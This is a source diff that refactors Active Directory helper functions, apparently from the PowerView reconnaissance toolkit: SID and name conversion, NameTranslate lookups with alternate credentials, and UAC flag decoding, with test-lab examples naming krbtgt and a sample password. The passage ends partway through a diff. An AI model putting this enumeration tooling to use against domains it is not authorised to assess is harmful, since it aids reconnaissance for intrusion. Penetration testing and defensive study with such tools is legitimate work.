+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name', 'Identity')]
+        [String[]]
         $ObjectName,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Domain
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $ObjectName = $ObjectName -Replace "/","\"
-    
-    if($ObjectName.Contains("\")) {
-        # if we get a DOMAIN\user format, auto convert it
-        $Domain = $ObjectName.Split("\")[0]
-        $ObjectName = $ObjectName.Split("\")[1]
-    }
-    elseif(-not $Domain) {
-        $Domain = (Get-NetDomain).Name
+    BEGIN {
+        $DomainSearcherArguments = @{}
+        if ($PSBoundParameters['Domain']) { $DomainSearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $DomainSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $DomainSearcherArguments['Credential'] = $Credential }
     }
 
-    try {
-        $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $ObjectName))
-        $SID = $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value
-        
-        $Out = New-Object PSObject
-        $Out | Add-Member Noteproperty 'ObjectName' $ObjectName
-        $Out | Add-Member Noteproperty 'SID' $SID
-        $Out
-    }
-    catch {
-        Write-Verbose "Invalid object/name: $Domain\$ObjectName"
-        $Null
+    PROCESS {
+        ForEach ($Object in $ObjectName) {
+            $Object = $Object -Replace '/','\'
+
+            if ($PSBoundParameters['Credential']) {
+                $DN = Convert-ADName -Identity $Object -OutputType 'DN' @DomainSearcherArguments
+                if ($DN) {
+                    $UserDomain = $DN.SubString($DN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                    $UserName = $DN.Split(',')[0].split('=')[1]
+
+                    $DomainSearcherArguments['Identity'] = $UserName
+                    $DomainSearcherArguments['Domain'] = $UserDomain
+                    $DomainSearcherArguments['Properties'] = 'objectsid'
+                    Get-DomainObject @DomainSearcherArguments | Select-Object -Expand objectsid
+                }
+            }
+            else {
+                try {
+                    if ($Object.Contains('\')) {
+                        $Domain = $Object.Split('\')[0]
+                        $Object = $Object.Split('\')[1]
+                    }
+                    elseif (-not $PSBoundParameters['Domain']) {
+                        $DomainSearcherArguments = @{}
+                        $Domain = (Get-Domain @DomainSearcherArguments).Name
+                    }
+
+                    $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $Object))
+                    $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value
+                }
+                catch {
+                    Write-Verbose "[ConvertTo-SID] Error converting $Domain\$Object : $_"
+                }
+            }
+        }
     }
 }
 
 
-filter Convert-SidToName {
+function ConvertFrom-SID {
 <#
-    .SYNOPSIS
-    
-        Converts a security identifier (SID) to a group/user name.
+.SYNOPSIS
+
+Converts a security identifier (SID) to a group/user name.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Convert-ADName  
+
+.DESCRIPTION
+
+Converts a security identifier string (SID) to a group/user name
+using Convert-ADName.
+
+.PARAMETER ObjectSid
+
+Specifies one or more SIDs to convert.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the translation, defaults to the current domain.
 
-    .PARAMETER SID
-    
-        The SID to convert.
+.PARAMETER Server
 
-    .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to for the translation.
 
-        PS C:\> Convert-SidToName S-1-5-21-2620891829-2411261497-1773853088-1105
+.PARAMETER Credential
+
+Specifies an alternate credential to use for the translation.
+
+.EXAMPLE
+
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
+
+TESTLAB\harmj0y
+
+.EXAMPLE
+
+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
+
+TESTLAB\WINDOWS2$
+TESTLAB\harmj0y
+BUILTIN\Distributed COM Users
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
+
+TESTLAB\harmj0y
+
+.INPUTS
+
+String
+
+Accepts one or more SID strings on the pipeline.
+
+.OUTPUTS
+
+String
+
+The converted DOMAIN\username.
 #>
+
+    [OutputType([String])]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
-        [String]
+    Param(
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('SID')]
         [ValidatePattern('^S-1-.*')]
-        $SID
+        [String[]]
+        $ObjectSid,
+
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Domain,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
+        [String]
+        $Server,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    try {
-        $SID2 = $SID.trim('*')
-
-        # try to resolve any built-in SIDs first
-        #   from https://support.microsoft.com/en-us/kb/243330
-        Switch ($SID2) {
-            'S-1-0'         { 'Null Authority' }
-            'S-1-0-0'       { 'Nobody' }
-            'S-1-1'         { 'World Authority' }
-            'S-1-1-0'       { 'Everyone' }
-            'S-1-2'         { 'Local Authority' }
-            'S-1-2-0'       { 'Local' }
-            'S-1-2-1'       { 'Console Logon ' }
-            'S-1-3'         { 'Creator Authority' }
-            'S-1-3-0'       { 'Creator Owner' }
-            'S-1-3-1'       { 'Creator Group' }
-            'S-1-3-2'       { 'Creator Owner Server' }
-            'S-1-3-3'       { 'Creator Group Server' }
-            'S-1-3-4'       { 'Owner Rights' }
-            'S-1-4'         { 'Non-unique Authority' }
-            'S-1-5'         { 'NT Authority' }
-            'S-1-5-1'       { 'Dialup' }
-            'S-1-5-2'       { 'Network' }
-            'S-1-5-3'       { 'Batch' }
-            'S-1-5-4'       { 'Interactive' }
-            'S-1-5-6'       { 'Service' }
-            'S-1-5-7'       { 'Anonymous' }
-            'S-1-5-8'       { 'Proxy' }
-            'S-1-5-9'       { 'Enterprise Domain Controllers' }
-            'S-1-5-10'      { 'Principal Self' }
-            'S-1-5-11'      { 'Authenticated Users' }
-            'S-1-5-12'      { 'Restricted Code' }
-            'S-1-5-13'      { 'Terminal Server Users' }
-            'S-1-5-14'      { 'Remote Interactive Logon' }
-            'S-1-5-15'      { 'This Organization ' }
-            'S-1-5-17'      { 'This Organization ' }
-            'S-1-5-18'      { 'Local System' }
-            'S-1-5-19'      { 'NT Authority' }
-            'S-1-5-20'      { 'NT Authority' }
-            'S-1-5-80-0'    { 'All Services ' }
-            'S-1-5-32-544'  { 'BUILTIN\Administrators' }
-            'S-1-5-32-545'  { 'BUILTIN\Users' }
-            'S-1-5-32-546'  { 'BUILTIN\Guests' }
-            'S-1-5-32-547'  { 'BUILTIN\Power Users' }
-            'S-1-5-32-548'  { 'BUILTIN\Account Operators' }
-            'S-1-5-32-549'  { 'BUILTIN\Server Operators' }
-            'S-1-5-32-550'  { 'BUILTIN\Print Operators' }
-            'S-1-5-32-551'  { 'BUILTIN\Backup Operators' }
-            'S-1-5-32-552'  { 'BUILTIN\Replicators' }
-            'S-1-5-32-554'  { 'BUILTIN\Pre-Windows 2000 Compatible Access' }
-            'S-1-5-32-555'  { 'BUILTIN\Remote Desktop Users' }
-            'S-1-5-32-556'  { 'BUILTIN\Network Configuration Operators' }
-            'S-1-5-32-557'  { 'BUILTIN\Incoming Forest Trust Builders' }
-            'S-1-5-32-558'  { 'BUILTIN\Performance Monitor Users' }
-            'S-1-5-32-559'  { 'BUILTIN\Performance Log Users' }
-            'S-1-5-32-560'  { 'BUILTIN\Windows Authorization Access Group' }
-            'S-1-5-32-561'  { 'BUILTIN\Terminal Server License Servers' }
-            'S-1-5-32-562'  { 'BUILTIN\Distributed COM Users' }
-            'S-1-5-32-569'  { 'BUILTIN\Cryptographic Operators' }
-            'S-1-5-32-573'  { 'BUILTIN\Event Log Readers' }
-            'S-1-5-32-574'  { 'BUILTIN\Certificate Service DCOM Access' }
-            'S-1-5-32-575'  { 'BUILTIN\RDS Remote Access Servers' }
-            'S-1-5-32-576'  { 'BUILTIN\RDS Endpoint Servers' }
-            'S-1-5-32-577'  { 'BUILTIN\RDS Management Servers' }
-            'S-1-5-32-578'  { 'BUILTIN\Hyper-V Administrators' }
-            'S-1-5-32-579'  { 'BUILTIN\Access Control Assistance Operators' }
-            'S-1-5-32-580'  { 'BUILTIN\Access Control Assistance Operators' }
-            Default { 
-                $Obj = (New-Object System.Security.Principal.SecurityIdentifier($SID2))
-                $Obj.Translate( [System.Security.Principal.NTAccount]).Value
+    BEGIN {
+        $ADNameArguments = @{}
+        if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
+        if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
+    }
+
+    PROCESS {
+        ForEach ($TargetSid in $ObjectSid) {
+            $TargetSid = $TargetSid.trim('*')
+            try {
+                # try to resolve any built-in SIDs first - https://support.microsoft.com/en-us/kb/243330
+                Switch ($TargetSid) {
+                    'S-1-0'         { 'Null Authority' }
+                    'S-1-0-0'       { 'Nobody' }
+                    'S-1-1'         { 'World Authority' }
+                    'S-1-1-0'       { 'Everyone' }
+                    'S-1-2'         { 'Local Authority' }
+                    'S-1-2-0'       { 'Local' }
+                    'S-1-2-1'       { 'Console Logon ' }
+                    'S-1-3'         { 'Creator Authority' }
+                    'S-1-3-0'       { 'Creator Owner' }
+                    'S-1-3-1'       { 'Creator Group' }
+                    'S-1-3-2'       { 'Creator Owner Server' }
+                    'S-1-3-3'       { 'Creator Group Server' }
+                    'S-1-3-4'       { 'Owner Rights' }
+                    'S-1-4'         { 'Non-unique Authority' }
+                    'S-1-5'         { 'NT Authority' }
+                    'S-1-5-1'       { 'Dialup' }
+                    'S-1-5-2'       { 'Network' }
+                    'S-1-5-3'       { 'Batch' }
+                    'S-1-5-4'       { 'Interactive' }
+                    'S-1-5-6'       { 'Service' }
+                    'S-1-5-7'       { 'Anonymous' }
+                    'S-1-5-8'       { 'Proxy' }
+                    'S-1-5-9'       { 'Enterprise Domain Controllers' }
+                    'S-1-5-10'      { 'Principal Self' }
+                    'S-1-5-11'      { 'Authenticated Users' }
+                    'S-1-5-12'      { 'Restricted Code' }
+                    'S-1-5-13'      { 'Terminal Server Users' }
+                    'S-1-5-14'      { 'Remote Interactive Logon' }
+                    'S-1-5-15'      { 'This Organization ' }
+                    'S-1-5-17'      { 'This Organization ' }
+                    'S-1-5-18'      { 'Local System' }
+                    'S-1-5-19'      { 'NT Authority' }
+                    'S-1-5-20'      { 'NT Authority' }
+                    'S-1-5-80-0'    { 'All Services ' }
+                    'S-1-5-32-544'  { 'BUILTIN\Administrators' }
+                    'S-1-5-32-545'  { 'BUILTIN\Users' }
+                    'S-1-5-32-546'  { 'BUILTIN\Guests' }
+                    'S-1-5-32-547'  { 'BUILTIN\Power Users' }
+                    'S-1-5-32-548'  { 'BUILTIN\Account Operators' }
+                    'S-1-5-32-549'  { 'BUILTIN\Server Operators' }
+                    'S-1-5-32-550'  { 'BUILTIN\Print Operators' }
+                    'S-1-5-32-551'  { 'BUILTIN\Backup Operators' }
+                    'S-1-5-32-552'  { 'BUILTIN\Replicators' }
+                    'S-1-5-32-554'  { 'BUILTIN\Pre-Windows 2000 Compatible Access' }
+                    'S-1-5-32-555'  { 'BUILTIN\Remote Desktop Users' }
+                    'S-1-5-32-556'  { 'BUILTIN\Network Configuration Operators' }
+                    'S-1-5-32-557'  { 'BUILTIN\Incoming Forest Trust Builders' }
+                    'S-1-5-32-558'  { 'BUILTIN\Performance Monitor Users' }
+                    'S-1-5-32-559'  { 'BUILTIN\Performance Log Users' }
+                    'S-1-5-32-560'  { 'BUILTIN\Windows Authorization Access Group' }
+                    'S-1-5-32-561'  { 'BUILTIN\Terminal Server License Servers' }
+                    'S-1-5-32-562'  { 'BUILTIN\Distributed COM Users' }
+                    'S-1-5-32-569'  { 'BUILTIN\Cryptographic Operators' }
+                    'S-1-5-32-573'  { 'BUILTIN\Event Log Readers' }
+                    'S-1-5-32-574'  { 'BUILTIN\Certificate Service DCOM Access' }
+                    'S-1-5-32-575'  { 'BUILTIN\RDS Remote Access Servers' }
+                    'S-1-5-32-576'  { 'BUILTIN\RDS Endpoint Servers' }
+                    'S-1-5-32-577'  { 'BUILTIN\RDS Management Servers' }
+                    'S-1-5-32-578'  { 'BUILTIN\Hyper-V Administrators' }
+                    'S-1-5-32-579'  { 'BUILTIN\Access Control Assistance Operators' }
+                    'S-1-5-32-580'  { 'BUILTIN\Access Control Assistance Operators' }
+                    Default {
+                        Convert-ADName -Identity $TargetSid @ADNameArguments
+                    }
+                }
+            }
+            catch {
+                Write-Verbose "[ConvertFrom-SID] Error converting SID '$TargetSid' : $_"
             }
         }
     }
-    catch {
-        Write-Verbose "Invalid SID: $SID"
-        $SID
-    }
 }
 
 
-filter Convert-ADName {
+function Convert-ADName {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Converts Active Directory object names between a variety of formats.
+
+Author: Bill Stewart, Pasquale Lantella  
+Modifications: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
 
-        Converts user/group names from NT4 (DOMAIN\user) or domainSimple (user@domain.com)
-        to canonical format (domain.com/Users/user) or NT4.
+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
+and translates Active Directory names between various formats using the NameTranslate COM object.
 
-        Based on Bill Stewart's code from this article: 
-            http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+.PARAMETER Identity
 
-    .PARAMETER ObjectName
+Specifies the Active Directory object name to translate, of the following form:
 
-        The user/group name to convert.
+    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+    NT4               domain\username; e.g., 'fabrikam\pflynn'
+    Display           display name, e.g. 'pflynn'
+    DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'
+    EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'
+    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+    UPN               user principal name; e.g., 'pflynn@fabrikam.com'
+    CanonicalEx       extended canonical name format
+    SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'
+    SID               Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
 
-    .PARAMETER InputType
+.PARAMETER OutputType
 
-        The InputType of the user/group name ("NT4","Simple","Canonical").
+Specifies the output name type you want to convert to, which must be one of the following:
 
-    .PARAMETER OutputType
+    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+    NT4               domain\username; e.g., 'fabrikam\pflynn'
+    Display           display name, e.g. 'pflynn'
+    DomainSimple      simple domain name format, e.g. 'pflynn@fabrikam.com'
+    EnterpriseSimple  simple enterprise name format, e.g. 'pflynn@fabrikam.com'
+    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+    UPN               user principal name; e.g., 'pflynn@fabrikam.com'
+    CanonicalEx       extended canonical name format, e.g. 'fabrikam.com/Users/Phineas Flynn'
+    SPN               service principal name format; e.g. 'HTTP/kairomac.contoso.com'
 
-        The OutputType of the user/group name ("NT4","Simple","Canonical").
+.PARAMETER Domain
 
-    .EXAMPLE
+Specifies the domain to use for the translation, defaults to the current domain.
 
-        PS C:\> Convert-ADName -ObjectName "dev\dfm"
-        
-        Returns "dev.testlab.local/Users/Dave"
+.PARAMETER Server
 
-    .EXAMPLE
+Specifies an Active Directory server (domain controller) to bind to for the translation.
 
-        PS C:\> Convert-SidToName "S-..." | Convert-ADName
-        
-        Returns the canonical name for the resolved SID.
+.PARAMETER Credential
 
-    .LINK
+Specifies an alternate credential to use for the translation.
 
-        http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+.EXAMPLE
+
+Convert-ADName -Identity "TESTLAB\harmj0y"
+
+harmj0y@testlab.local
+
+.EXAMPLE
+
+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
+
+testlab.local/Users/krbtgt
+testlab.local/Users/Administrator
+
+.EXAMPLE
+
+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
+
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
+
+TESTLAB\harmj0y
+
+.INPUTS
+
+String
+
+Accepts one or more objects name strings on the pipeline.
+
+.OUTPUTS
+
+String
+
+Outputs a string representing the converted name.
+
+.LINK
+
+http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67
 #>
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [OutputType([String])]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('Name', 'ObjectName')]
+        [String[]]
+        $Identity,
+
         [String]
-        $ObjectName,
+        [ValidateSet('DN', 'Canonical', 'NT4', 'Display', 'DomainSimple', 'EnterpriseSimple', 'GUID', 'Unknown', 'UPN', 'CanonicalEx', 'SPN')]
+        $OutputType,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        [ValidateSet("NT4","Simple","Canonical")]
-        $InputType,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        [ValidateSet("NT4","Simple","Canonical")]
-        $OutputType
+        $Server,
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    $NameTypes = @{
-        'Canonical' = 2
-        'NT4'       = 3
-        'Simple'    = 5
-    }
+    BEGIN {
+        $NameTypes = @{
+            'DN'                =   1  # CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com
+            'Canonical'         =   2  # fabrikam.com/Engineers/Phineas Flynn
+            'NT4'               =   3  # fabrikam\pflynn
+            'Display'           =   4  # pflynn
+            'DomainSimple'      =   5  # pflynn@fabrikam.com
+            'EnterpriseSimple'  =   6  # pflynn@fabrikam.com
+            'GUID'              =   7  # {95ee9fff-3436-11d1-b2b0-d15ae3ac8436}
+            'Unknown'           =   8  # unknown type - let the server do translation
+            'UPN'               =   9  # pflynn@fabrikam.com
+            'CanonicalEx'       =   10 # fabrikam.com/Users/Phineas Flynn
+            'SPN'               =   11 # HTTP/kairomac.contoso.com
+            'SID'               =   12 # S-1-5-21-12986231-600641547-709122288-57999
+        }
 
-    if(-not $PSBoundParameters['InputType']) {
-        if( ($ObjectName.split('/')).Count -eq 2 ) {
-            $ObjectName = $ObjectName.replace('/', '\')
+        # accessor functions from Bill Stewart to simplify calls to NameTranslate
+        function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {
+            $Output = $Null
+            $Output = $Object.GetType().InvokeMember($Method, 'InvokeMethod', $NULL, $Object, $Parameters)
+            Write-Output $Output
         }
 
-        if($ObjectName -match "^[A-Za-z]+\\[A-Za-z ]+") {
-            $InputType = 'NT4'
+        function Get-Property([__ComObject] $Object, [String] $Property) {
+            $Object.GetType().InvokeMember($Property, 'GetProperty', $NULL, $Object, $NULL)
         }
-        elseif($ObjectName -match "^[A-Za-z ]+@[A-Za-z\.]+") {
-            $InputType = 'Simple'
+
+        function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {
+            [Void] $Object.GetType().InvokeMember($Property, 'SetProperty', $NULL, $Object, $Parameters)
         }
-        elseif($ObjectName -match "^[A-Za-z\.]+/[A-Za-z]+/[A-Za-z/ ]+") {
-            $InputType = 'Canonical'
+
+        # https://msdn.microsoft.com/en-us/library/aa772266%28v=vs.85%29.aspx
+        if ($PSBoundParameters['Server']) {
+            $ADSInitType = 2
+            $InitName = $Server
         }
-        else {
-            Write-Warning "Can not identify InType for $ObjectName"
-            return $ObjectName
+        elseif ($PSBoundParameters['Domain']) {
+            $ADSInitType = 1
+            $InitName = $Domain
         }
-    }
-    elseif($InputType -eq 'NT4') {
-        $ObjectName = $ObjectName.replace('/', '\')
-    }
-
-    if(-not $PSBoundParameters['OutputType']) {
-        $OutputType = Switch($InputType) {
-            'NT4' {'Canonical'}
-            'Simple' {'NT4'}
-            'Canonical' {'NT4'}
+        elseif ($PSBoundParameters['Credential']) {
+            $Cred = $Credential.GetNetworkCredential()
+            $ADSInitType = 1
+            $InitName = $Cred.Domain
+        }
+        else {
+            # if no domain or server is specified, default to GC initialization
+            $ADSInitType = 3
+            $InitName = $Null
         }
     }
 
-    # try to extract the domain from the given format
-    $Domain = Switch($InputType) {
-        'NT4' { $ObjectName.split("\")[0] }
-        'Simple' { $ObjectName.split("@")[1] }
-        'Canonical' { $ObjectName.split("/")[0] }
-    }
-
-    # Accessor functions to simplify calls to NameTranslate
-    function Invoke-Method([__ComObject] $Object, [String] $Method, $Parameters) {
-        $Output = $Object.GetType().InvokeMember($Method, "InvokeMethod", $Null, $Object, $Parameters)
-        if ( $Output ) { $Output }
-    }
-    function Set-Property([__ComObject] $Object, [String] $Property, $Parameters) {
-        [Void] $Object.GetType().InvokeMember($Property, "SetProperty", $Null, $Object, $Parameters)
-    }
+    PROCESS {
+        ForEach ($TargetIdentity in $Identity) {
+            if (-not $PSBoundParameters['OutputType']) {
+                if ($TargetIdentity -match "^[A-Za-z]+\\[A-Za-z ]+") {
+                    $ADSOutputType = $NameTypes['DomainSimple']
+                }
+                else {
+                    $ADSOutputType = $NameTypes['NT4']
+                }
+            }
+            else {
+                $ADSOutputType = $NameTypes[$OutputType]
+            }
 
-    $Translate = New-Object -ComObject NameTranslate
+            $Translate = New-Object -ComObject NameTranslate
 
-    try {
-        Invoke-Method $Translate "Init" (1, $Domain)
-    }
-    catch [System.Management.Automation.MethodInvocationException] { 
-        Write-Verbose "Error with translate init in Convert-ADName: $_"
-    }
+            if ($PSBoundParameters['Credential']) {
+                try {
+                    $Cred = $Credential.GetNetworkCredential()
+
+                    Invoke-Method $Translate 'InitEx' (
+                        $ADSInitType,
+                        $InitName,
+                        $Cred.UserName,
+                        $Cred.Domain,
+                        $Cred.Password
+                    )
+                }
+                catch {
+                    Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' using alternate credentials : $_"
+                }
+            }
+            else {
+                try {
+                    $Null = Invoke-Method $Translate 'Init' (
+                        $ADSInitType,
+                        $InitName
+                    )
+                }
+                catch {
+                    Write-Verbose "[Convert-ADName] Error initializing translation for '$Identity' : $_"
+                }
+            }
 
-    Set-Property $Translate "ChaseReferral" (0x60)
+            # always chase all referrals
+            Set-Property $Translate 'ChaseReferral' (0x60)
 
-    try {
-        Invoke-Method $Translate "Set" ($NameTypes[$InputType], $ObjectName)
-        (Invoke-Method $Translate "Get" ($NameTypes[$OutputType]))
-    }
-    catch [System.Management.Automation.MethodInvocationException] {
-        Write-Verbose "Error with translate Set/Get in Convert-ADName: $_"
+            try {
+                # 8 = Unknown name type -> let the server do the work for us
+                $Null = Invoke-Method $Translate 'Set' (8, $TargetIdentity)
+                Invoke-Method $Translate 'Get' ($ADSOutputType)
+            }
+            catch [System.Management.Automation.MethodInvocationException] {
+                Write-Verbose "[Convert-ADName] Error translating '$TargetIdentity' : $($_.Exception.InnerException.Message)"
+            }
+        }
     }
 }
 
 
 function ConvertFrom-UACValue {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Converts a UAC int value to human readable form.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+
+.DESCRIPTION
+
+This function will take an integer that represents a User Account
+Control (UAC) binary blob and will covert it to an ordered
+dictionary with each bitwise value broken out. By default only values
+set are displayed- the -ShowAll switch will display all values with
+a + next to the ones set.
+
+.PARAMETER Value
 
-        Converts a UAC int value to human readable form.
+Specifies the integer UAC value to convert.
 
-    .PARAMETER Value
+.PARAMETER ShowAll
 
-        The int UAC value to convert.
+Switch. Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.
 
-    .PARAMETER ShowAll
+.EXAMPLE
 
-        Show all UAC values, with a + indicating the value is currently set.
+ConvertFrom-UACValue -Value 66176
 
-    .EXAMPLE
+Name                           Value
+----                           -----
+ENCRYPTED_TEXT_PWD_ALLOWED     128
+NORMAL_ACCOUNT                 512
+DONT_EXPIRE_PASSWORD           65536
 
-        PS C:\> ConvertFrom-UACValue -Value 66176
+.EXAMPLE
 
-        Convert the UAC value 66176 to human readable format.
+Get-DomainUser harmj0y | ConvertFrom-UACValue
 
-    .EXAMPLE
+Name                           Value
+----                           -----
+NORMAL_ACCOUNT                 512
+DONT_EXPIRE_PASSWORD           65536
 
-        PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue
+.EXAMPLE
 
-        Convert the UAC value for 'jason' to human readable format.
+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll
 
-    .EXAMPLE
+Name                           Value
+----                           -----
+SCRIPT                         1
+ACCOUNTDISABLE                 2
+HOMEDIR_REQUIRED               8
+LOCKOUT                        16
+PASSWD_NOTREQD                 32
+PASSWD_CANT_CHANGE             64
+ENCRYPTED_TEXT_PWD_ALLOWED     128
+TEMP_DUPLICATE_ACCOUNT         256
+NORMAL_ACCOUNT                 512+
+INTERDOMAIN_TRUST_ACCOUNT      2048
+WORKSTATION_TRUST_ACCOUNT      4096
+SERVER_TRUST_ACCOUNT           8192
+DONT_EXPIRE_PASSWORD           65536+
+MNS_LOGON_ACCOUNT              131072
+SMARTCARD_REQUIRED             262144
+TRUSTED_FOR_DELEGATION         524288
+NOT_DELEGATED                  1048576
+USE_DES_KEY_ONLY               2097152
+DONT_REQ_PREAUTH               4194304
+PASSWORD_EXPIRED               8388608
+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216
+PARTIAL_SECRETS_ACCOUNT        67108864
 
-        PS C:\> Get-NetUser jason | select useraccountcontrol | ConvertFrom-UACValue -ShowAll
+.INPUTS
 
-        Convert the UAC value for 'jason' to human readable format, showing all
-        possible UAC values.
+Int
+
+Accepts an integer representing a UAC binary blob.
+
+.OUTPUTS
+
+System.Collections.Specialized.OrderedDictionary
+
+An ordered dictionary with the converted UAC fields.
+
+.LINK
+
+https://support.microsoft.com/en-us/kb/305144
 #>
-    
+
+    [OutputType('System.Collections.Specialized.OrderedDictionary')]
     [CmdletBinding()]
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+    Param(
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('UAC', 'useraccountcontrol')]
+        [Int]
         $Value,
 
         [Switch]
         $ShowAll
     )
 
-    begin {
+    BEGIN {
         # values from https://support.microsoft.com/en-us/kb/305144
         $UACValues = New-Object System.Collections.Specialized.OrderedDictionary
         $UACValues.Add("SCRIPT", 1)
@@ -1214,26 +1724,12 @@ function ConvertFrom-UACValue {
         $UACValues.Add("PARTIAL_SECRETS_ACCOUNT", 67108864)
     }
 
-    process {
-
+    PROCESS {
         $ResultUACValues = New-Object System.Collections.Specialized.OrderedDictionary
 
-        if($Value -is [Int]) {
-            $IntValue = $Value
-        }
-        elseif ($Value -is [PSCustomObject]) {
-            if($Value.useraccountcontrol) {
-                $IntValue = $Value.useraccountcontrol
-            }
-        }
-        else {
-            Write-Warning "Invalid object input for -Value : $Value"
-            return $Null 
-        }
-
-        if($ShowAll) {
-            foreach ($UACValue in $UACValues.GetEnumerator()) {
-                if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {
+        if ($ShowAll) {
+            ForEach ($UACValue in $UACValues.GetEnumerator()) {
+                if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
                     $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)+")
                 }
                 else {
@@ -1242,8 +1738,8 @@ function ConvertFrom-UACValue {
             }
         }
         else {
-            foreach ($UACValue in $UACValues.GetEnumerator()) {
-                if( ($IntValue -band $UACValue.Value) -eq $UACValue.Value) {
+            ForEach ($UACValue in $UACValues.GetEnumerator()) {
+                if ( ($Value -band $UACValue.Value) -eq $UACValue.Value) {
                     $ResultUACValues.Add($UACValue.Name, "$($UACValue.Value)")
                 }
             }
@@ -1253,221 +1749,909 @@ function ConvertFrom-UACValue {
 }
 
 
-filter Get-Proxy {
+function Get-PrincipalContext {
 <#
-    .SYNOPSIS
-    
-        Enumerates the proxy server and WPAD conents for the current user.
+.SYNOPSIS
 
-    .PARAMETER ComputerName
+Helper to take an Identity and return a DirectoryServices.AccountManagement.PrincipalContext
+and simplified identity.
 
-        The computername to enumerate proxy settings on, defaults to local host.
+Author: Will Schroeder (@harmj0y)  
